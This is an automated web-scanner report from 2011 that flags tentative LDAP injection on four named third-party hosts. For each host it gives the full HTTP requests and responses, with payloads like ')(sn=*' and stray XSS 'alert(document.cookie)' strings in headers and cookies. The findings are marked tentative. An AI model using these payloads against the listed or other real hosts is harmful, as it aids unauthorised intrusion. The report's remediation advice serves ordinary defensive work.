LDAP Injection, DORK, Vulnerable Hosts, LDAP Query

CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')

Report generated by XSS.CX at Mon Mar 07 19:17:28 CST 2011.

The DORK Report

Loading

1. LDAP injection

1.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

1.2. http://data.cmcore.com/imp [ci parameter]

1.3. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js [REST URL parameter 3]

1.4. https://webmail.roadrunner.com/includes/webmail.416a.css [BIGipServerCDPTPA-Web-Pool cookie]


1. LDAP injection
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

1.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 8c42615bf40cc5bc)(sn=* and 8c42615bf40cc5bc)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=8c42615bf40cc5bc)(sn=*&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:33:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_8c42615bf40cc5bc)(sn=exp=1&initExp=Mon Mar 7 01:33:59 2011&recExp=Mon Mar 7 01:33:59 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:33:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=8c42615bf40cc5bc)!(sn=*&PRAd=1124773&AR_C=1417957 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/info/index.htm?61f90%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef6d4b116b2a=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p58096422=exp=14&initExp=Sun Feb 20 13:23:21 2011&recExp=Sun Feb 20 15:33:35 2011&cpn=%25m&prad=50296263&arc=37630094&; ar_p39750809=exp=4&initExp=Sun Feb 20 15:54:29 2011&recExp=Mon Feb 21 22:06:08 2011&prad=1210151&arc=1444454&; ar_p81479006=exp=1&initExp=Tue Mar 1 01:55:30 2011&recExp=Tue Mar 1 01:55:30 2011&prad=59117794&arc=40340043&; ar_p84053757=exp=2&initExp=Mon Mar 7 00:55:41 2011&recExp=Mon Mar 7 00:55:43 2011&prad=1160142&arc=1420280&; BMX_3PC=1; UID=2206bdab-24.143.206.75-1298208201; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1299459344%2E057%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 07 Mar 2011 01:33:59 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_8c42615bf40cc5bc)!(sn=exp=1&initExp=Mon Mar 7 01:33:59 2011&recExp=Mon Mar 7 01:33:59 2011&prad=1124773&arc=1417957&; expires=Sun 05-Jun-2011 01:33:59 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/
1.2. http://data.cmcore.com/imp [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 74889b964e0b55dc)(sn=* and 74889b964e0b55dc)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=74889b964e0b55dc)(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=Display-_-BannerAds-_-AkamaiNoPromo-_-Ak54&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5RoAAMGcFwCywIAAAAAAAL4xGwAAAAAAAAAEAAIAAAAAAA8AAgABFGbRJQAAAAAA82UjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyZA8AAAAAAAIAAgAAAAAAAAAAAAAA8D8AAAAAAADwP93XgXNGlOY.ZmZmZmZm8j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARyYOi9Ra9CRhNoLlmrpsdFRTRwgfIeHM7akU-AAAAAA==,,http%3A%2F%2Fwww.merriam-webster.com%2Fcreative.php%3Fpageid%3Dgeneral%26placement%3Dmw_gen_300_bot%26groupid%3D5267702644%26quantseg%3Dd%3At%3A2884%3A2775%3A1799%3A1361%3A1360%3A1355%3A1353%3A1349%3A1345%3A1343%3A1340%26keyword%3D%26subjcode%3D,Z%3D300x250%26s%3D1547457%26_salt%3D2014343997%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.merriam-webster.com%252Fcreative.php%253Fpageid%253DGeneral%2526placement%253DMW_GEN_300_BOT%2526groupid%253D5267702644%2526quantseg%253DD%253AT%253A2884%253A2775%253A1799%253A1361%253A1360%253A1355%253A1353%253A1349%253A1345%253A1343%253A1340%2526keyword%253D%2526subjcode%253D%26r%3D0,d8ad597a-4858-11e0-8d5e-003048d6d022
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=30021298897084116815020; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:37 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 74889b964e0b55dc)(sn=*_login=1299462637015106151474889b964e0b55dc)(sn=*; path=/
Set-Cookie: 74889b964e0b55dc)(sn=*_reset=1299462637;path=/
Expires: Sun, 06 Mar 2011 07:50:37 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=74889b964e0b55dc)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=Display-_-BannerAds-_-AkamaiNoPromo-_-Ak54&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?5RoAAMGcFwCywIAAAAAAAL4xGwAAAAAAAAAEAAIAAAAAAA8AAgABFGbRJQAAAAAA82UjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyZA8AAAAAAAIAAgAAAAAAAAAAAAAA8D8AAAAAAADwP93XgXNGlOY.ZmZmZmZm8j8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAARyYOi9Ra9CRhNoLlmrpsdFRTRwgfIeHM7akU-AAAAAA==,,http%3A%2F%2Fwww.merriam-webster.com%2Fcreative.php%3Fpageid%3Dgeneral%26placement%3Dmw_gen_300_bot%26groupid%3D5267702644%26quantseg%3Dd%3At%3A2884%3A2775%3A1799%3A1361%3A1360%3A1355%3A1353%3A1349%3A1345%3A1343%3A1340%26keyword%3D%26subjcode%3D,Z%3D300x250%26s%3D1547457%26_salt%3D2014343997%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.merriam-webster.com%252Fcreative.php%253Fpageid%253DGeneral%2526placement%253DMW_GEN_300_BOT%2526groupid%253D5267702644%2526quantseg%253DD%253AT%253A2884%253A2775%253A1799%253A1361%253A1360%253A1355%253A1353%253A1349%253A1345%253A1343%253A1340%2526keyword%253D%2526subjcode%253D%26r%3D0,d8ad597a-4858-11e0-8d5e-003048d6d022
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=30021298897084116815020; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:50:38 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 74889b964e0b55dc)!(sn=*_login=1299462638015106151474889b964e0b55dc)!(sn=*; path=/
Set-Cookie: 74889b964e0b55dc)!(sn=*_reset=1299462638;path=/
Expires: Sun, 06 Mar 2011 07:50:38 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;
1.3. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/alice.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/alice.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads 109a64327263f5fe)(sn=* and 109a64327263f5fe)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /partner/scripts/109a64327263f5fe)(sn=*/alice.js?pc=7469/12005&ptc=20615 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GKFXS0FR-AL95-10.250.119.239; put_2081=KH-00000000549735899; put_2025=a7d02798-393f-4104-ada5-fc2c44a755c0; put_1994=6pgp44i37uxw; put_1523=99c93c82-afc1-4f06-bdc1-8fb83dd4c018; put_2100=usr3fe6528d7df33180; put_1902=pFrKmPYNzMy9Ccea81vSnagHy5-9D53Np1zmR_H3; __utmz=58628265.1299283361.1.1.utmcsr=assets.rubiconproject.com|utmccn=(referral)|utmcmd=referral|utmcct=/; put_1512=4d5b2371-3928-7a83-24fb-d52328f5624b; put_1185=8392341830659049202; put_1986=4470455573253905340; put_2132=439524AE836A5E4D157CECA302E891CB; put_1197=3346767141746773094; lm="5 Mar 2011 00:09:20 GMT"; khaos=GKFXT7RL-D-D539; cd=false; put_1430=20108b4d-f8d0-4008-b157-1529097b61ab; __unam=84b15f2-12e8352bcfa-25f8d37f-6; __utma=58628265.419258632.1299283361.1299283361.1299330390.2; rpb=5671%3D1%265328%3D1%264940%3D1%262341%3D1%265557%3D1%263049%3D1%266198%3D1%266147%3D1%265901%3D1%264222%3D1%264894%3D1%266286%3D1%264214%3D1%262372%3D1%263169%3D1%262196%3D1%262111%3D1%262374%3D1%264554%3D1%265573%3D1%265575%3D1%262188%3D1%263748%3D1%266195%3D1; ruid=dd0a2"-alert(document.cookie)-"693757dd992^2^1299459402^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=7477^1&13531^1&12005^1; csi15=3172581.js^1^1299459402^1299459402&3193851.js^2^1299380258^1299434520&3175993.js^1^1299380257^1299380257; ses2=7477^37&12005^1; csi2=3172579.js^1^1299460672^1299460672&3193850.js^1^1299380258^1299380258&3086939.js^1^1299380252^1299380252; rdk=7469/12005; rdk9=0; ses9=13531^1&12005^1; csi9=3194819.js^1^1299460723^1299460723&3195084.js^1^1299434501^1299434501

Response 1

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Mon, 07 Mar 2011 01:47:58 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: private, max-age=3600
Expires: Mon, 07 Mar 2011 02:47:58 GMT
Date: Mon, 07 Mar 2011 01:47:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10590




/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */





oz_partner = "109a64327263f5fe)(sn=*";
oz_partner_channel="7469/12005";
oz_partner_tracking_channel="20615";





if(typeof oz_page_profiled=="undefined"){oz_page_profiled=false;}if(typeof oz_subframes_allowed=="undefined"){oz_subframes_allowed=false;}if(typeof oz_source=="undefined"){oz_source=document;}var oz_scripts_loaded=new Object();function OthersOnlineSensor(){this.config={delayAfterLoad:2*1000,sensor_sample:100,pixel_sample:25,domain_specific_parsing:false,use_local_storage:false,subframes_allowed:false,host:"http://tap.rubiconproject.com",statichost:"http://tap-cdn.rubiconproject.com"};
this.default_context={oz_partner:"othersonline.com",oz_session_id:null,oz_partner_user_id:null,oz_partner_channel:null,oz_partner_tracking_channel:null};this.context=null;this.page_parser=null;this.timeout=1500;this.init=function(A){try{if(A){this.context=this.mergeProperties(A,this.default_context);
}else{this.context=this.default_context;}if(this.context.oz_host){this.config.host=this.context.oz_host;}if(this.context.oz_statichost){this.config.statichost=this.context.oz_statichost;}if(this.context.oz_delay){this.config.delayAfterLoad=this.context.oz_delay;}if(this.context.oz_subframes_allowed){this.config.subframes_allowed=this.context.oz_subframes_allowed;
}if(this.context.oz_local_storage){this.config.use_local_storage=this.context.oz_local_storage;}if(this.config.use_local_storage&&!this.context.oz_user_token&&(typeof oz_swfobject=="object")){try{if(
...[SNIP]...

Request 2

GET /partner/scripts/109a64327263f5fe)!(sn=*/alice.js?pc=7469/12005&ptc=20615 HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7469/12005/20615-9.html?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GKFXS0FR-AL95-10.250.119.239; put_2081=KH-00000000549735899; put_2025=a7d02798-393f-4104-ada5-fc2c44a755c0; put_1994=6pgp44i37uxw; put_1523=99c93c82-afc1-4f06-bdc1-8fb83dd4c018; put_2100=usr3fe6528d7df33180; put_1902=pFrKmPYNzMy9Ccea81vSnagHy5-9D53Np1zmR_H3; __utmz=58628265.1299283361.1.1.utmcsr=assets.rubiconproject.com|utmccn=(referral)|utmcmd=referral|utmcct=/; put_1512=4d5b2371-3928-7a83-24fb-d52328f5624b; put_1185=8392341830659049202; put_1986=4470455573253905340; put_2132=439524AE836A5E4D157CECA302E891CB; put_1197=3346767141746773094; lm="5 Mar 2011 00:09:20 GMT"; khaos=GKFXT7RL-D-D539; cd=false; put_1430=20108b4d-f8d0-4008-b157-1529097b61ab; __unam=84b15f2-12e8352bcfa-25f8d37f-6; __utma=58628265.419258632.1299283361.1299283361.1299330390.2; rpb=5671%3D1%265328%3D1%264940%3D1%262341%3D1%265557%3D1%263049%3D1%266198%3D1%266147%3D1%265901%3D1%264222%3D1%264894%3D1%266286%3D1%264214%3D1%262372%3D1%263169%3D1%262196%3D1%262111%3D1%262374%3D1%264554%3D1%265573%3D1%265575%3D1%262188%3D1%263748%3D1%266195%3D1; ruid=dd0a2"-alert(document.cookie)-"693757dd992^2^1299459402^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=7477^1&13531^1&12005^1; csi15=3172581.js^1^1299459402^1299459402&3193851.js^2^1299380258^1299434520&3175993.js^1^1299380257^1299380257; ses2=7477^37&12005^1; csi2=3172579.js^1^1299460672^1299460672&3193850.js^1^1299380258^1299380258&3086939.js^1^1299380252^1299380252; rdk=7469/12005; rdk9=0; ses9=13531^1&12005^1; csi9=3194819.js^1^1299460723^1299460723&3195084.js^1^1299434501^1299434501

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private, max-age=86400
Date: Mon, 07 Mar 2011 01:47:58 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 221

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /oz/scripts/alice_js.jsp was not found on this server.</p>
</body></html>
1.4. https://webmail.roadrunner.com/includes/webmail.416a.css [BIGipServerCDPTPA-Web-Pool cookie]  previous

Summary

Severity:   High
Confidence:   Tentative
Host:   https://webmail.roadrunner.com
Path:   /includes/webmail.416a.css

Issue detail

The BIGipServerCDPTPA-Web-Pool cookie appears to be vulnerable to LDAP injection attacks.

The payloads 57c7b07a51392553)(sn=* and 57c7b07a51392553)!(sn=* were each submitted in the BIGipServerCDPTPA-Web-Pool cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /includes/webmail.416a.css?l=en-US&v=standard HTTP/1.1
Host: webmail.roadrunner.com
Connection: keep-alive
Referer: https://webmail.roadrunner.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerCDPTPA-Web-Pool=57c7b07a51392553)(sn=*; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcRBH_ux1UYd7BjUDr6s

Response 1

HTTP/1.1 200 OK
Server: Resin/3.0.21
Cache-Control: private
Cache-Control: max-age=604800
Expires: Mon, 14 Mar 2011 18:07:27 GMT
ETag: "A2Z+9fBVy59"
Last-Modified: Thu, 13 Jan 2011 16:46:41 GMT
Set-Cookie: JSESSIONID=abcuhaqltufy08YOjGr6s; path=/
Content-Type: text/css
Content-Length: 52245
Date: Mon, 07 Mar 2011 18:07:27 GMT
Set-Cookie: BIGipServerCDPTPA-Web-Pool=2701164298.20480.0000; path=/

@CHARSET "ISO-8859-1";

A:active, A:focus {outline:0;} /* Eliminates the border around active links in Firefox */
A:hover {text-decoration:none;}
A {text-decoration:none;}
A:active {color: #FAAD3E; text-decoration: none;}
SPAN.more {color:#FFFFFF;}

iframe { border: none;}

/* <-- HEADER WEBMAIL CSS CLASSES - START --> */
.siteSearch FORM LABEL.enhanced {float:left;margin-left:10px;background:url('/images/label_google.gif') 0px 0px no-repeat;width:63px;height:34px;display:block;margin-top:2px;font-size:0px;text-indent:-5000px;}

.header .content .tertiaryNav LI.username {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
}

.header .content .tertiaryNav LI.signout {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
   padding-left: 0px;
}

.leaderboardTop {
text-align: center;
background: #232428 url(/images/ad300x250_advertisement.gif) no-repeat scroll 50% 7px;
}

.leaderboardTop .border {
text-align: left;
vertical-align: top;
height: 100%;
max-height: 90px;
}

/* header div is 4 pixels wider to account for the shadows on the navigation menu */
.header .content .login {
   position: relative;
   width: 966px;
   height: 160px;
   overflow: hidden;
text-align:center;
}
/* <-- HEADER WEBMAIL CSS CLASSES - END --> */

.content {text-align: left;}

/* <-- ERROR CSS CLASSES - START --> */
.webmailErrorInfoSection {
position: relative;
padding: 2px 0px;
margin-top: 10px;
margin-bottom:5px;
}

.webmailError {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -252px 1px no-repeat;
   width: 19px;
   height: 14px;
}

.webmailInfo {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -303px 0px no-repeat;
   width: 17px;
   height: 16px;
}

.webmailErrorInf
...[SNIP]...

Request 2

GET /includes/webmail.416a.css?l=en-US&v=standard HTTP/1.1
Host: webmail.roadrunner.com
Connection: keep-alive
Referer: https://webmail.roadrunner.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerCDPTPA-Web-Pool=57c7b07a51392553)!(sn=*; s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=abcRBH_ux1UYd7BjUDr6s

Response 2

HTTP/1.1 200 OK
Server: Resin/3.0.21
Cache-Control: max-age=604800
Expires: Mon, 14 Mar 2011 18:07:29 GMT
ETag: "A2Z+9fBVy59"
Last-Modified: Thu, 13 Jan 2011 16:46:41 GMT
Content-Type: text/css
Content-Length: 52245
Date: Mon, 07 Mar 2011 18:07:29 GMT
Set-Cookie: BIGipServerCDPTPA-Web-Pool=2701164298.20480.0000; path=/

@CHARSET "ISO-8859-1";

A:active, A:focus {outline:0;} /* Eliminates the border around active links in Firefox */
A:hover {text-decoration:none;}
A {text-decoration:none;}
A:active {color: #FAAD3E; text-decoration: none;}
SPAN.more {color:#FFFFFF;}

iframe { border: none;}

/* <-- HEADER WEBMAIL CSS CLASSES - START --> */
.siteSearch FORM LABEL.enhanced {float:left;margin-left:10px;background:url('/images/label_google.gif') 0px 0px no-repeat;width:63px;height:34px;display:block;margin-top:2px;font-size:0px;text-indent:-5000px;}

.header .content .tertiaryNav LI.username {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
}

.header .content .tertiaryNav LI.signout {
   float: left;
   margin: 3px 7px 0px 10px;
   font-size: 90%;
   padding-left: 0px;
}

.leaderboardTop {
text-align: center;
background: #232428 url(/images/ad300x250_advertisement.gif) no-repeat scroll 50% 7px;
}

.leaderboardTop .border {
text-align: left;
vertical-align: top;
height: 100%;
max-height: 90px;
}

/* header div is 4 pixels wider to account for the shadows on the navigation menu */
.header .content .login {
   position: relative;
   width: 966px;
   height: 160px;
   overflow: hidden;
text-align:center;
}
/* <-- HEADER WEBMAIL CSS CLASSES - END --> */

.content {text-align: left;}

/* <-- ERROR CSS CLASSES - START --> */
.webmailErrorInfoSection {
position: relative;
padding: 2px 0px;
margin-top: 10px;
margin-bottom:5px;
}

.webmailError {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -252px 1px no-repeat;
   width: 19px;
   height: 14px;
}

.webmailInfo {
   background: url('/images/webmail_images/icon_sprite_16x16.gif') -303px 0px no-repeat;
   width: 17px;
   height: 16px;
}

.webmailErrorInfoTxt {
font-family: arial;
font-size: 12px;
font-weight: bold;
padding-left: 40px;
text-align: left;
}

/* <
...[SNIP]...
Report generated by XSS.CX at Mon Mar 07 19:17:28 CST 2011.